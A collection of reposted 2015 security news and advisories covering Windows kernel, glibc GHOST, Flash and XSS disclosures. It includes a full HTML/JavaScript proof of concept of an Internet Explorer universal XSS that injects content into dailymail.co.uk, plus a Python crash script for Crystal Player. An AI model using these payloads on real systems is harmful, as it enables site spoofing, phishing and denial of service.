meanwhile, made its case that its disclosure policies are working, with vulnerabilities patched consistently and quicker by most of the affected vendors. It says, for example, that Adobe has patched 37 vulnerabilities reported by Google inside of the 90-day deadline; 154 Project Zero vulnerabilities overall (85 percent) were fixed inside of 90 days. Sursa

The vulnerabilities addressed in this month’s Patch Tuesday security bulletins from Microsoft have been a mashup of critical bugs affecting most supported versions of Windows and Internet Explorer that could pave the way for attackers to gain complete control of affected systems. Sounds like most months, for sure. But what sets this month apart is the regular stream of disclosures from researchers in the hours and days following patches from Microsoft. The latest surrounds MS15-010, a bulletin that patches six critical remote code execution, security bypass and privilege escalation bugs in the Windows kernel-mode driver. That bulletin includes a security feature bypass in CNG.sys, or the Cryptography Next Generation kernel-mode driver, disclosed by Google’s Project Zero research team. The vulnerability was out in the open for close to two weeks after Project Zero’s 90-day disclosure window expired. Details on a privilege escalation vulnerability, CVE-2015-0057, in the Windows kernel GUI component, the Win32k.sys module, yesterday were shared by researchers at enSilo. According to CTO Udi Gavo, all versions of Windows are affected, including the Windows 10 Technical Preview, and attackers could exploit the bug and gain control over the compromised computer. “A threat actor that gains access to a Windows machine (say, through a phishing campaign) can exploit this vulnerability to bypass all Windows security measures, defeating mitigation measures such as sandboxing, kernel segregation and memory randomization,” he said in a published report. The vulnerability can be exploited by modifying one bit in Windows, the report said. The exploit works, enSilo said, despite the presence of numerous kernel-level protections instituted by Microsoft, in particular in Windows 8.1. Kernel DEP, ASLR, SMEP and others are mitigations that prevent code execution within certain kernel regions, but some researchers have already developed bypasses. EnSilo provides technical details on the vulnerability in its report, in particular an examination of the xxxEnableWndSBArrows function which enables and disables scrollbars in Windows. “Through a single call, this function can alter the state of both scrollbars,” the report said. “It is precisely within this function wherein the vulnerability lies.” On Tuesday, consultancy JAS Global Advisors released details on critical vulnerabilities in Group Policy that expose Windows users to man-in-the-middle attacks, remote code execution attacks, and security bypasses. The Jasbug, as it was nicknamed, was reported in January 2014 but since it was a design issue rather than one related to an implementation, it required some re-engineering by Microsoft. “The vulnerability is remotely exploitable and may grant the attacker administrator level privileges on the target machine/device,” JAS said. “Roaming machines – domain-joined Windows devices that connect to corporate networks via the public Internet (e.g. from hotels and coffee shops) – are at heightened risk.” JAS said that computers connecting over a virtual private network should be immune to compromise. Further mitigating the risk, JAS said, is that a number of scenarios have to be in place for exploits to work. “It certainly doesn’t work universally and it depends on some funky misconfigurations and happenstance. But it works frequently enough to be of concern,” JAS said in its advisory. Microsoft also addressed reports with a silent feature update in Visual Studio (KB3001652) that was causing Windows machines to lock up. The update has since been re-released after it was removed from Windows Update. Sursa

Introduction Today, Microsoft released their latest Patch Tuesday. This Patch includes a fix for vulnerability CVE-2015-0057, an IMPORTANT-rated exploitable vulnerability which we responsibly disclosed to Microsoft a few months ago. As part of our research, we revealed this privilege escalation vulnerability which, if exploited, enables a threat actor to complete control of a Windows machine. In other words, a threat actor that gains access to a Windows machine (say, through a phishing campaign) can exploit this vulnerability to bypass all Windows security measures, defeating mitigation measures such as sandboxing, kernel segregation and memory randomization. Interestingly, the exploit requires modifying only a single bit of the Windows operating system. We have verified this exploit against all supported Windows desktop versions, including Windows 10 Technical Preview. This entry starts by detailing the vulnerability. At first, it seemed to us impossible to exploit. After some hard word, however, we managed to produce a fully working exploit which we’ll describe. As part of this analysis, we also present a video which demonstrates the exploit. Finally, we conclude this entry with a buggy dead-code anecdote which we thought interesting to share. Responsible disclosure: although this blog entry is technical, we won’t reveal any code, or the complete details, to prevent any tech master from being able to reproduce an exploit. Background Over the last several years, privilege escalation vulnerabilities became all the more crucial for exploitation because they enable malicious code to run on the kernel. As such, a threat actor exploiting a privileged escalation vulnerability can bypass protective security mechanisms such as application sandboxes. Step by step with the attackers’ progress, Microsoft made extensive efforts to protect the kernel. The reasoning is that even if a vulnerability exists, exploiting it would be difficult, if not impossible. For example, here are just a few of the kernel protection mechanisms that are present in Windows 8.1:Kernel DEP – Ensures that most kernel data regions cannot be executed • Kernel DEP – Ensures that most kernel data regions cannot be executed • KASLR – Randomizes the kernel address-space to avoid figuring out where kernel modules exist • Integrity Level – Limits the ability of an unprivileged application to leak kernel-related information • Mitigation Of Common Attack Vectors – Hardens commonly abused structures (such as the Win32k wnd proc field) • SMEP – Prevents execution control transfers between kernel mode to user-mode • NULL Dereference Protection – Prohibits mapping of the first 64k of data in user-mode Albeit these hardening mechanisms, in the past year we have seen some notable presentations that demonstrated techniques to bypass these protections. The vulnerability which we describe in this entry, is a newly disclosed privilege escalation exploitable vulnerability that too bypasses these protections. The Vulnerability: a hole in the Win32k.sys module This particular vulnerability appears in the GUI component of Microsoft Windows Kernel, namely, the Win32k.sys module. This entry assumes a strong technical understanding of the Win32k.sys module. For detailed information on this module, please refer to Tajei Mandt, Gilad Bakas and Gil Dabah. Zooming into Window Scrollbars The Win32k module manages also the actual windows’ scrollbars. These scrollbars – whether horizontal or vertical – are set for each window. Let’s zoom into these scrollbars: As can be seen in Figure 1, each SBDATA structure defines the information regarding one of the scrollbars. The WSBflags is a bitmask that determines the state of the scrollbars. In order to enable and disable a window scrollbar, the function xxxEnableWndSBArrows is used. Through a single call, this function can alter the state of both scrollbars. It is precisely within this function wherein the vulnerability lies. Deep Diving into xxxEnableWndSBArrows The prototype of xxxEnableWndSBArrows is: • Wnd – A pointer to the relevant window • wSBflags – The scrollbar type (e.g. horizontal or vertical) • wArrows – Specifies whether the scrollbar’s arrows are enabled or disabled and indicates which arrows are enabled or disabled. In order to describe the vulnerability, we’ll take a look at the first part of the xxxEnableWndSBArrows function which can be broken down into 3 logical parts: Part 1 – Allocation of a new scrollbar (if needed) The function starts by checking whether there is already scrollbar information for that window and allocates a new scrollbar information struct, if needed. Technically speaking, the function reads the pSBInfo field (to recall, this field points to the tagSBINFO struct) and tests if the pointer is NULL. If the field is null and the wArrows parameter is not NULL, then a tagSBINFO struct is allocated for the window and the old flags of the scrollbars are set to 0. Otherwise the old flags are copied from the existing window’s scrollbars information. The code can be found in Figure 2. Part 2 – Setting the state of the horizontal scrollbar The flow continues by testing whether the state of horizontal scrollbar should be changed. According to what was set in the wArrows argument, the function enables or disables the arrows (figure 3). Part 3 – Testing the state of the scrollbar arrows The flow continues by checking whether the state of the arrows have changed. Technically speaking, this is done by checking the arrow’s flags (to note, there are a few more flag checks – but those are not interesting for our purpose). If the flags have changed and the window is visible then xxxDrawScrollbar is called. This is precisely the place where things get interesting. When digging into the code, it seems possible that the xxxDrawScrollBar will lead to a user–mode callback (Figure 4). The pivotal function in this call chain is the ClientLoadLibrary. This function performs the callback to the user-mode function __ClientLoadLibrary. Let’s return now to the code of xxxEnableWndSBArrows. Our examination showed that the tagSBINFO pointer is used without any verification after the callback. Ultimately, this could lead to a Use-After-Free (UAF) vulnerability since the function may continue to work with the freed scrollbar information (Figure 5). The Exploitation: manipulating windows properties After the callback, the function xxxEnableWndSBArrows continues and changes the state of the vertical scrollbar. At this stage, the function tries to enable or disable the flags. However, since the struct is already freed, we can use this to either Bitwise OR the first DWORD of the freed buffer with 0xC (if we disable the arrows) or to clear bit 3 and 4 (if we enable the arrows). See figure 6 For simplicity sake, we show how to manipulate 2 bits in order to “rule them all”. However, manipulating only one of them would be enough. The bit manipulation at first didn’t seem enough to result in anything significant, but we decided to keep trying. The most obvious things to try were to either increase the size of some buffer (using the bitwise OR) or decrease some reference counter (using the bitwise AND). After a short search we found an object that met the first requirement. This object is the properties list of a window. The Window Properties List Each window has a properties list. Generally, these properties can be used by the GUI application to store arbitrary values, though also Win32K uses this properties list in order to store internal data. The data structures used to hold the window’s properties can be seen in Figure 7. The first field, cEntries, is the number of entries in the properties array; iFirstFree is the index to the first free cell in the properties array; and props is the array itself. An application can set the window’s properties using the SetProp API. The prototype of the function is as follows: • hWnd – The handle to the window. • lpString – The of the property or an ATOM. • hData – The data to store. Adding properties to a window is performed through the CreateProp function, appearing in the win32k module. As can be seen in figure 8 its allocation algorithm is quite simple. If there is no room for a new property in the list, the function allocates a new properties list with one more entry. The function then proceeds to copy the buffer of the old properties to the new one, frees the old buffer and increases the entries count. There are several important things to note in this code: First, the properties are allocated from the Desktop heap (Uses DesktopAlloc). Also, tagSBINFO is allocated from this heap. This is crucial if we want to use the UAF vulnerability to alter the properties structure. Second, each new entry triggers the reallocation of the buffer. This means that we can easily trigger the reallocation of the buffer when it’s about to reach the size of the tagSBINFO structure. Doing this increases the chances that the buffer will be allocated over the freed tagSBINFO struct. Third, and most importantly, the cEntries field is located in the first DWORD of the struct. This means that we can increase its size (using the bitwise Or). After increasing the size of the properties array we basically achieved a classical buffer-overflow. Proof-of-Concept Video The above research led to the privilege escalation exploitation. We stop here, however, to avoid releasing any sensitive code. Our demo on a 64-bit Windows 10 Technical Preview provides the necessary proof-of-concept: Summary After some work we managed to create a reliable exploit for all versions of Windows – dating back as of Windows XP to Windows 10 preview (With SMEP and protections turned on). We have shown that even a minor bug can be used to gain complete control over any Windows Operating System. Nevertheless, we think that Microsoft efforts to make the its operating system more secure raised the bar significantly and made writing reliable exploits far harder than before. Unfortunately, these measures are not going to keep attackers at bay. We predict that attackers will continue incorporating exploits into their crime kits, making compromise inevitable. Last side note: funny code Examining the code of the xxxEnableWndSBArrows function showed that there are calls to the xxxWindowEvent function. At first glance it seemed that these two functions would be far easier to use as an exploitation stepping stone than the xxxDrawScrollbar function, as detailed above. However, after diving into the code it quickly became clear that the calls to xxxWindowEvent in the Horizontal scrollbar part of the code are actually dead-code (Figure 9). Looking at the code, there are two conditional calls to the function, xxxWindowEvent. These calls are executed only if the old flags of the scrollbar information differ from those of the new flags. However, by the time these conditions appear, the values of the old flags and the new flags are always equal. Hence, the condition for calling xxxWindowEvent is never met. This practically means that this dead-code was there for about 15-years doing absolutely nothing. Source

What drove IT admins crazy about the Bash vulnerability was that it was difficult to determine—and patch—everything that was making a Bash call. It was everywhere. Apparently, some of that angst applies to the Ghost vulnerability in the GNU C library, known as glibc. At first, experts believed the bug, which was related to gethostbyname function calls, was confined to Linux systems, but it didn’t take long for other exploit vectors such as PHP applications, to surface. Researchers at Veracode this week published their look at Ghost and determined that like Bash, gethostbyname is relatively everywhere. And what’s sure to compound lingering frustration over Ghost is that gethostbyname was long ago deprecated and replaced by getaddrinfo() calls in order to satisfy IPv6 compatibility. “We were surprised by the pervasiveness of calls to these functions, which are older functions which have been deprecated for about 15 years, mainly because of their lack of support for IPv6,” said Veracode cofounder and CTO Chris Wysopal. “So this analysis shows that there’s still a lot of old software out there that’s being used in production applications.” Veracode said that 41 percent of the enterprise applications uploaded to its platform in the past 90 days rely on glibc to make gethostbyname function calls. The company added that 80 percent of those potentially vulnerable applications are critical off-the-shelf or homegrown business apps that access databases and backend systems executing sensitive transactions. Most of those vulnerable applications, Veracode said, were written in C or C++, but many are also Java, PHP and .NET apps. “This implies that the vulnerability may be more widespread than might otherwise be expected,” Wysopal said. “Knowing exactly where these applications reside can help enterprises prioritize their patching efforts in globally-distributed environments.” Ghost affects most Linux systems dating back almost 15 years, in particular glibc 2.2 through 2.17. The vulnerability was patched in May 2013, though the patch was not labeled a security vulnerability and as a result may not have been widely deployed. Since the bug was disclosed, most Linux distributions have released patches, and experts say this is the best mitigation for Ghost. Researchers at Qualys discovered the vulnerability and posted a lengthy advisory that included proof-of-concept exploit code against the Exim SMTP mail transfer agent. In addition to Exim, clockdiff, procmail and pppd were initiallyidentified as vulnerable to Ghost exploits. Since then, researchers at Sucuri also said that PHP applications, including WordPress, were another weak spot. Exploiting Ghost, however, remains a challenge. “Unlike with Heartbleed, which was a protocol-level vulnerability, exploiting this vulnerability requires a specially-crafted payload that has been targeted for a specific application and hardware platform,” Wysopal said. “That means you can’t simply reuse the proof-of-concept exploit developed by Qualys (for the Exim mail server) to attack other applications. As a result, GHOST attacks are more likely to be sophisticated and targeted.” Like other Internet-wide bugs, this one can be exploited to execute code remotely, manipulate files, install malware or turn the compromised machine into a bot to be used in DDoS attacks. “Some researchers believe that the most likely outcome in a real-world scenario would be a segmentation fault, not code execution, but this can also result in a DoS attack,” Wysopal said. The Ghost bug and other major vulnerabilities of the last nine months are a reminder of the frailty of open source security as well as how much insecure legacy code is running inside most enterprises. “The most important conclusion is that our entire digital infrastructure is built on applications and components that were fundamentally not designed for the hostile cyber environment in which we find ourselves today,” said Wysopal, who added that 90 percent of the applications scanned and analyzed by Veracode’s service contain common application security vulnerabilities such as SQL injection. “Rather, they were designed with a primary focus on functionality rather than on secure programming practices.” Source

HackerOne, the popular security response and bug bounty platform, rewarded a researcher with with a $5,000 bounty for identifying a severe cross-site scripting (XSS) vulnerability. HackerOne hosts bug bounty programs for several organizations, but the company also runs a program for its own services. So far, HackerOne has thanked 54 hackers for helping the company keep its services secure, but Trello developer Daniel LeCheminant is the first to find a flaw rated “severe.” The researcher discovered that he could insert arbitrary HTML code into bug reports and other pages that use Markdown, a markup language designed for text-to-HTML conversions. “While being able to insert persistent, arbitrary HTML is often game over, HackerOne uses Content Security Policy (CSP) headers that made a lot of the fun stuff ineffective; e.g. I could insert a <script> tag or an element with an event handler, but it wouldn't run because these unsafe inline scripts were blocked by their CSP,” LeCheminant explained in a blog post. “Fortunately (for me) not all browsers have full support for CSP headers (e.g. Internet Explorer 11), so it wasn't hard to make a case that being able to run arbitrary script when someone attempted to view a bug that I'd submitted qualified as something that ‘might grant unauthorized access to confidential bug descriptions’,” he added. An attacker couldn’t have exploited the vulnerability to run arbitrary scripts, but as the expert demonstrated, the bug was serious enough. LeCheminant managed to change visual elements on the page (e.g. color of the links) because HackerOne’s CSP allows inline styles, and even insert an image into his submission. According to the researcher, an attacker could have also inserted other elements, such as text areas, and he could have redirected visitors of the page to an arbitrary website by using the meta refresh method. When users click on links found in bug reports, they are redirected to a warning page where they are informed that they are about leave HackerOne and visit a potentially unsafe website. However, by leveraging the XSS found by LeCheminant, a malicious actor could have bypassed the warning page and take users directly to a potentially harmful site. The vulnerability was reported just three days ago and it was resolved by HackerOne one day later. Source: securityweek.com

A researcher has identified a serious universal cross-site scripting (UXSS) vulnerability in the latest version of Microsoft’s Internet Explorer web browser. The issue was discovered by David Leo, a researcher at the UK-based security firm Deusen. The vulnerability can be leveraged to completely bypass Same Origin Policy (SOP), the policy that prevents scripts loaded from one origin from interacting with a resource from another origin. The bug allows an attacker to “steal anything from another domain, and inject anything into another domain,” the expert said in a post on Full Disclosure. A proof-of-concept (PoC) exploit for the vulnerability, tested on Internet Explorer 11 running on Windows 7, was published by Leo over the weekend. The PoC shows how an external domain can alter the content of a website. In the demonstration, the text “Hacked by Deusen” is injected into the website of The Daily Mail. The URL in the browser’s address bar remains the same -- in this case dailymail.co.uk -- even after the arbitrary content is injected, which makes this vulnerabilty ideal for phishing attacks. Joey Fowler, a senior security engineer at Tumblr, said the exploit has some “quirks,” but it works as long as the targeted website doesn’t have X-Frame-Options headers with “deny” or “same-origin” values. “Pending the payload being injected, most Content Security Policies are also bypassed (by injecting HTML instead of JavaScript, that is),” Fowler said in a reply to Leo’s Full Disclosure post. “It looks like, through this method, all viable XSS tactics are open!” Fowler has also highlighted the fact that the exploit can even bypass standard HTTP-to-HTTPS restrictions. The issue was reported to Microsoft on October 13, 2014. The company says it’s working on fixing the vulnerability, but has pointed out that an attacker needs to trick potential victims into visiting a malicious website for the exploit to work. “To successfully exploit this issue, an adversary would first need to lure a person, often through trickery such as phishing, to a malicious website that they’ve created. SmartScreen, which is on by default in newer versions of Internet Explorer, helps protect against nefarious phishing websites,” a Microsoft spokesperson told SecurityWeek. “We’re not aware of this vulnerability being actively exploited and are working to address it with an update. We continue to encourage customers to avoid opening links from untrusted sources and visiting untrusted sites, and to log out when leaving sites to help protect their information.” This isn’t the first time a vulnerability affecting Microsoft products is disclosed before the company manages to release a patch. Over the past weeks, Google’s Project Zero published the details of three Windows vulnerabilities after the expiration of a 90-day disclosure deadline. Source: securityweek.com

Adobe Systems has made a patch available for a zero-day vulnerability in Flash Player that came under attack in recent days. The vulnerability, CVE-2015-0313, affects Adobe Flash Player 16.0.0.296 and earlier versions for Windows, Macintosh and Linux, as well as Flash Player 13.0.0.264 and earlier 13.x versions. The vulnerability can be exploited to cause a crash and possibly take control of a vulnerable systems. So far, the vulnerability is known to have been used to target systems running Internet Explorer and Firefox on Windows 8.1 and below. The bug has been linked to malvertising attacks. In the days since news broke of the vulnerability, security researchers have determined that the zero-day was being leveraged by a lesser known exploit called 'HanJuan' – not the Angler kit as some had previously thought. "Exploit kits are made of different parts that can be updated as time goes on," Malwarebyes Senior Security Researcher Jerome Segura blogged recently. "That is one critical part as most software programs evolve and new vulnerabilities are discovered. Since there is a high demand to have the most effective exploitation tools, there is a lot of money that goes into making the exploit kits better." The malvertising attack detected by Trend Micro impacted visitors to dailymotion.com, who were directed to a series of sites that ultimately led to the exploit kit. Malvertisements are an old style of malware delivery, but they remain incredibly notorious because websites have no choice but to load ads and trust whatever content is served by third parties, blogged Trend Micro Threats Analyst Brooks Li. Users, on the other hand, have no choice but to accept ads as a part of their everyday browsing experience as well, Li added. According to Adobe, users who have enabled auto-update for the Flash Player desktop runtime will be receiving version 16.0.0.305 beginning today to fix CVE-2015-0313. "Adobe expects to have an update available for manual download on February 5, and we are working with our distribution partners to make the update available in Google Chrome and Internet Explorer 10 and 11," according to Adobe. This vulnerability is the third Flash Player zero-day discovered in the past month that came under attack. In January, Adobe patched CVE-2015-0310, which could be used to circumvent memory randomization mitigations on Windows, as well as CVE-2015-0311, which could be leveraged to cause a crash or hijack a vulnerable system. Source: securityweek.com

<title>insider3show</title> <body style="font-family:Georgia;"> <h1>insider3show</h1> <iframe style="display:none;" width=300 height=300 id=i name=i src="1.php"></iframe><br> <iframe width=300 height=100 frameBorder=0 src="http://www.dailymail.co.uk/robots.txt"></iframe><br> <script> function go() { w=window.frames[0]; w.setTimeout("alert(eval('x=top.frames[1];r=confirm(\\'Close this window after 3 seconds...\\');x.location=\\'javascript:%22%3Cscript%3Efunction%20a()%7Bw.document.body.innerHTML%3D%27%3Ca%20style%3Dfont-size%3A50px%3EHacked%20by%20Deusen%3C%2Fa%3E%27%3B%7D%20function%20o()%7Bw%3Dwindow.open(%27http%3A%2F%2Fwww.dailymail.co.uk%27%2C%27_blank%27%2C%27top%3D0%2C%20left%3D0%2C%20width%3D800%2C%20height%3D600%2C%20location%3Dyes%2C%20scrollbars%3Dyes%27)%3BsetTimeout(%27a()%27%2C7000)%3B%7D%3C%2Fscript%3E%3Ca%20href%3D%27javascript%3Ao()%3Bvoid(0)%3B%27%3EGo%3C%2Fa%3E%22\\';'))",1); } setTimeout("go()",1000); </script> <b>Summary</b><br> An Internet Explorer vulnerability is shown here:<br> Content of dailymail.co.uk can be changed by external domain.<br> <br> <b>How To Use</b><br> 1. Close the popup window("confirm" dialog) after three seconds.<br> 2. Click "Go".<br> 3. After 7 seconds, "Hacked by Deusen" is actively injected into dailymail.co.uk.<br> <br> <b>Screenshot</b><br> <a href="screenshot.png">screenshot.png</a><br> <br> <b>Technical Details</b><br> Vulnerability: Universal Cross Site Scripting(XSS)<br> Impact: Same Origin Policy(SOP) is completely bypassed<br> Attack: Attackers can steal anything from another domain, and inject anything into another domain<br> Tested: Jan/29/2015 Internet Explorer 11 Windows 7<br> <br> <h1><a href="http://www.deusen.co.uk/">www.deusen.co.uk</a></h1><script type="text/javascript"> //<![CDATA[ try{if (!window.CloudFlare) {var CloudFlare=[{verbose:0,p:0,byc:0,owlid:"cf",bag2:1,mirage2:0,oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dok3v=1613a3a185/"},atok:"6e87366c9054a61c3c7f1d71c9cfb464",petok:"0fad4629f14e9e2e51da3427556c8e191894b109-1422897396-1800",zone:"deusen.co.uk",rocket:"0",apps:{}}];CloudFlare.push({"apps":{"ape":"9e0d475915b2fa34aea396c09e17a7eb"}});!function(a,{a=document.createElement("script"),b=document.getElementsByTagName("script")[0],a.async=!0,a.src="//ajax.cloudflare.com/cdn-cgi/nexp/dok3v=919620257c/cloudflare.min.js",b.parentNode.insertBefore(a,}()}}catch(e){}; //]]> </script> Source

Here we will be looking a kernel level privilege escalation vulnerability CVE - 2014 - 4113 . The vulnerability is exploited by creating tagWND structure at NULL page (0x000 00000). We’ll see here why control is transferred to the shellcode and the reason the malicious tagWND structure is th e crafted the way it is. User - Mode Code The exe first tries to determine the OS it is running on and stores the following data in the vari able based on the OS version and build: Windows Xp S p2 0c8 Windows Xp S p1 12c Windows Xp S p3 0d8 Windows Server 2008 0e0 windows 7 / Windows Server 2008 R2 0f8 Read more: http://www.exploit-db.com/wp-content/themes/exploit/docs/35937.pdf

A critical vulnerability has been found in glibc, the GNU C library, that affects all Linux systems dating back to 2000. Attackers can use this flaw to execute code and remotely gain control of Linux machines. The issue stems from a heap-based buffer overflow found in the __nss_hostname_digits_dots() function in glibc. That particular function is used by the _gethostbyname function calls. “A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application,” said an advisory from Linux distributor Red Hat. The vulnerability, CVE-2015-0235, has already been nicknamed GHOST because of its relation to the _gethostbyname function. Researchers at Qualys discovered the flaw, and say it goes back to glibc version 2.2 in Linux systems published in November 2000. According to Qualys, there is a mitigation for this issue that was published May 21, 2013 between patch glibc-2.17 versions and glibc-2.18. “Unfortunately, it was not recognized as a security threat; as a result, most stable and long-term-support distributions were left exposed (and still are): Debian 7 (wheezy), Red Hat Enterprise Linux 6 & 7, CentOS 6 & 7, Ubuntu 12.04, for example,” said an advisory from Qualys posted to the OSS-Security mailing list. Respective Linux distributions will be releasing patches; Red Hat has released an update for Red Hat Enterprise Linux v.5 server. Novell has a list of SUSE Linux Enterprise Server builds affected by the vulnerability. Debian has already released an update of its software addressing the vulnerability. “It’s everywhere, which is kind of the urgency we have here. This has been in glibc for a long time. It was fixed recently, but it was not marked as a security issue, so things that are fairly new should be OK,” said Josh Bressers, a member of the Red Hat security response team. “From a threat level, what it comes down to is a handful of stuff that’s probably dangerous that uses this function.” Unlike past Internet-wide bugs such as Bash, patching glibc may not be the chore it was with Bash since so many components made silent Bash calls. “In this instance, you just apply the glibc update, and restart any services that are vulnerable,” Bressers said. “It’s not confusing like Shellshock was.” Qualys, in its advisory, not only shares extremely in-depth technical information on the vulnerability, but also includes a section explaining exploitation of the Exim SMTP mail server. The advisory demonstrates how to bypass NX, or No-eXecute protection as well as glibc malloc hardening, Qualys said. Qualys also said that in addition to the 2013 patch, other factors mitigate the impact of the vulnerability, including the fact that the gethostbyname functions are obsolete because of IPv6 and newer applications using a different call, getaddrinfo(). While the flaw is also exploitable locally, this scenario too is mitigated because many programs rely on gethostbyname only if another preliminary call fails and a secondary call succeeds in order to reach the overflow. The advisory said this is “impossible” and those programs are safe. There are mitigations against remote exploitation too, Qualys said. Servers, for example, use gethostbyname to perform full-circle reverse DNS checks. “These programs are generally safe because the hostname passed to gethostbyname() has normally been pre-validated by DNS software,” the advisory. “It’s not looking like a huge remote problem, right now,” Bressers said. However, while the bug may have been dormant since 2000, there is no way to tell if criminals or government-sponsored hackers have been exploiting this vulnerability. Nor is there any way to tell what will happen once legitimate security researchers—and black hats—begin looking at the vulnerability now that it’s out in the open. With Bash, for example, it didn’t take long for additional security issues to rise to the surface. Source

Document Title: =============== Crystal Player 1.99 - Memory Corruption Vulnerability Date: ============= 21/01/2015 Vendor Homepage: ================ http://www.crystalreality.com/ Abstract Advisory Information: ============================== Memory Corruption Vulnerability on Crystal Player 1.99. Affected Product(s): ==================== Crystal Player 1.99 Exploitation Technique: ======================= Local Severity Level: =============== Medium Technical Details & Description: ================================ A Memory Corruption Vulnerability is detected on Crystal Player 1.99. An attacker can crash the software by using .mls file. Attackers can crash the software local by user inter action over mls (playlist). --- DEBUG LOG --- ///registers EAX 00000000 ECX 0006FE24 EDX 0006FE24 EBX 0013014C ESP 0006F300 EBP 00060041 ESI 00FF4A00 EDI 00000001 EIP 0040F933 Crystal.0040F933 C 0 ES 0023 32bit 0(FFFFFFFF) P 1 CS 001B 32bit 0(FFFFFFFF) A 1 SS 0023 32bit 0(FFFFFFFF) Z 0 DS 0023 32bit 0(FFFFFFFF) S 1 FS 003B 32bit 7FFDE000(FFF) T 0 GS 0000 NULL D 0 O 0 LastErr ERROR_NOT_ENOUGH_MEMORY (00000008) EFL 00010296 (NO,NB,NE,A,S,PE,L,LE) ST0 empty ST1 empty ST2 empty ST3 empty ST4 empty ST5 empty ST6 empty ST7 empty 3 2 1 0 E S P U O Z D I FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT) FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1 --- ERROR LOG --- Crystal+0xf933: 0040f933 8b5510 mov edx,dword ptr [ebp+10h] ss:0023:00060051=???????? 00060051 doesnt exist in the program aka not allowed .. so memcopy fails... EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff) ExceptionAddress: 0040f933 (Crystal+0xf933) Access violation when reading [00060051] Proof of Concept (PoC): ======================= This vulnerabilities can be exploited by local attackers with userinteraction ... #!/usr/bin/python buffer = "A"*30000 filename = "Crash"+".mls" file = open(filename, 'w') file.write(buffer) file.close() print "[] Successfully MLS Created []" How to perform: ======================= 1) Open Immunity Debugger and attach Crystal Player 1.99 2) Run it, Now move .mls file that we generated by our python script to the player 3) Once again you have to move the same file in Crystal Player 1.99 for adding second playlist. When you perform above steps so application will crash. Analyze it on Immunity. Solution - Fix & Patch: ======================= Restrict working maximum size & set a own exception-handling for over-sized requests. Security Risk: ============== The security risk of the vulnerability is estimated as medium because of the local crash method. Authors: ================== Kapil Soni (Haxinos) Source

A critical cross-site scripting (XSS) vulnerability in the Google Apps administrator console allowed cyber criminals to force a Google Apps admins to execute just about any request on the https://admin.google.com/ domain. The Google Apps admin console allows administrators to manage their organization’s account. Administrators can use the console to add new users, configure permissions, manage security settings and enable Google services for your domain. The feature is primarily used by many businesses, especially those using Gmail as the e-mail service for their domain. The XSS flaw allowed attackers to force the admin to do the following actions: Creating new users with "super admin" rights Disabling two-factor authentication (2FA) and other security measures from existing accounts or from multiple domains Modifying domain settings so that all incoming e-mails are redirected to addresses controlled by the attacker Hijack an account/email by resetting the password, disabling 2FA, and also removing login challenges temporarily for 10 minutes This new zero-day vulnerability was discovered and privately reported by application security engineer Brett Buerhaus to Google on September 1 and the company fixed the flaw within 17 days. In exchange for the report, Google paid the researcher $5,000 as a reward under its bug bounty program. According to the researcher, when users access a service that hasn’t been configured for their domain, they are presented with a "ServiceNotAllowed" page. This page allows users to switch between accounts in order to log in to the service. However, when one of the accounts was selected, a piece of JavaScript code was executed in an attempt to redirect the user’s Web browser. JavaScript code could be supplied by the user in the "continue" request parameter of the URL, which allowed XSS attacks. Patching the vulnerability on the 17th day after reported to the company shows the search engine giant’s concern to secure its software and users as well. However, the recent vulnerability troubles visited Microsoft exposed one-after-one three serious zero-day vulnerabilities in Windows 7 and 8.1 operating systems, reported by Google’s Project Zero team. Microsoft wasn't able to fix the security flaws in its software even after a three-month-long time period provided to the company. Source

Document Title: =============== LizardSquad DDoS Stresser - Multiple Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1417 http://magazine.vulnerability-db.com/?q=articles/2015/01/20/lizardsquad-ddos-stresser-multiple-vulnerabilities-revealed-takeover-ddos# Release Date: ============= 2015-01-20 Vulnerability Laboratory ID (VL-ID): ==================================== 1417 Common Vulnerability Scoring System: ==================================== 8.9 Product & Service Introduction: =============================== The product, called Lizard Stresser is a stress tester that might let you see how your own network stands up to DDoS attacks, like the ones that interrupted the gaming networks for several days last week. DDoS attacks basically overload servers with massive amounts of bogus requests. (Copy of the Homepage: https://lizardstresser.su/ ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official LizardSquad DDoS Stresser online-service web-application. Vulnerability Disclosure Timeline: ================================== 2015-01-20: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== LizardSquad Product: DDoS Stresser - Web Application (Online-Service) 2015 Q1 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ Multiple web vulnerabilities has been discovered in the official LizardSquad `Stresser DDoS Service` web-application. 1.1 The 1st vulnerability is located in `username` value of the registration module. A user can register a script code as payload to the name values. The ddos web-service of the input on registration uses the wrong conditions to encode and parse. Thus allows to execute the injected script code in the `./ref` module of the service. The request method to inject is POST and the vulnerability is located on the application-side of the ddos stresser service. The main administrators are able to see the user passwords, by watching the logs of an compromised server you see that they can switch by login in through the registered user accounts. This is possible because of plain transfered passwords in the ddos application. The known event can be used to prepare malicious code that executes function in connection with application-side injected script codes. The vulnerable file to inject the code is the register.php file. Another execution of the injected script code occurs in the main dashboard (left sidebar) were the username is getting visible. Vulnerable Module(s): [+] Registration (./ref) Vulnerable Parameter(s): [+] username Affected Module(s): [+] Dashboard (Username in Left Sidebar) 1.2 The 2nd vulnerability is located in the Ticket Title & Ticket Content input fields of the `Tickets` (tickets) module. A fresh registered user account is able to inject own malicious persistent script code to the ticket input fields to exploit a backend administrator account. After an attacker registers and inject own script code to the ticket system he is able to get the ip of the backend users or can compromise the session data of moderators/administrators. The inject occurs in the `./tickets` module. The execution takes place locally in the listed open ticket items of the backend. Remote attackers are also able to access other tickets and stored information by intercepting the session of the add Ticket POST method request. Vulnerable Module(s): [+] Tickets (./tickets) Vulnerable Parameter(s): [+] name (servername) 1.3 The 3rd vulnerability is located in the target server `name` value. The attacker uses the device or servername to send malicious data to the ddos application control panel. A remote attacker can change the server or device name value to a script code payload that executes in the panel (server target list). The service syncs the the device/server name value after the infection but also if the attacker syncs the data manually. In case of usage macOS to attack it is possible to change the servername easily to a malicious script code payload that affects the ddos control panel. Vulnerable Module(s): [+] server list Vulnerable Parameter(s): [+] name 